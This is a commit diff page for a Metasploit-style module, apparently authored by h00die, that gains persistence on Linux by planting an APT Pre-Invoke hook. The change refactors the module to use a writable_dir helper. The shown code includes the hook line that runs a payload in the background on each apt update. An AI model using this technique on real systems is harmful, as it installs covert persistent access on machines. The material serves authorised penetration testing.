Skip to content

Commit 638beeb

Browse files
h00dieh00die
committed
apt persistence updates for mixin
1 parent 711d8d0 commit 638beeb

File tree

1 file changed

+5
-6
lines changed

1 file changed

+5
-6
lines changed

modules/exploits/linux/persistence/apt_package_manager.rb

Lines changed: 5 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -68,23 +68,22 @@ def check
6868
return CheckCode::Safe("#{datastore['HOOKPATH']} not found") unless exists?(datastore['HOOKPATH'])
6969
return CheckCode::Safe("#{datastore['HOOKPATH']} not writable") unless writable?(datastore['HOOKPATH'])
7070

71-
print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
72-
return CheckCode::Safe("#{datastore['WritableDir']} not found") unless exists?(datastore['WritableDir'])
73-
return CheckCode::Safe("#{datastore['WritableDir']} not writable") unless writable?(datastore['WritableDir'])
71+
print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
72+
return CheckCode::Safe("#{writable_dir} not found") unless exists?(writable_dir)
73+
return CheckCode::Safe("#{writable_dir} not writable") unless writable?(writable_dir)
7474

75-
CheckCode::Appears("#{datastore['HOOKPATH']} and #{datastore['WritableDir']} are writable, also found apt-get.")
75+
CheckCode::Appears("#{datastore['HOOKPATH']} and #{writable_dir} are writable, also found apt-get.")
7676
end
7777

7878
def install_persistence
7979
fail_with Failure::BadConfig, "#{datastore['HOOKPATH']} not writable, or APT is not on system" unless writable?(datastore['HOOKPATH'])
8080
hook_path = datastore['HOOKPATH']
8181
hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
8282

83-
@clean_up_rc = ''
8483
if payload.arch.first == 'cmd'
8584
hook_script = %(APT::Update::Pre-Invoke {"setsid #{payload.encoded} 2>/dev/null &"};)
8685
else
87-
payload_path = datastore['WritableDir']
86+
payload_path = writable_dir
8887
payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
8988
payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
9089
payload_path << payload_name

0 commit comments

Comments
 (0)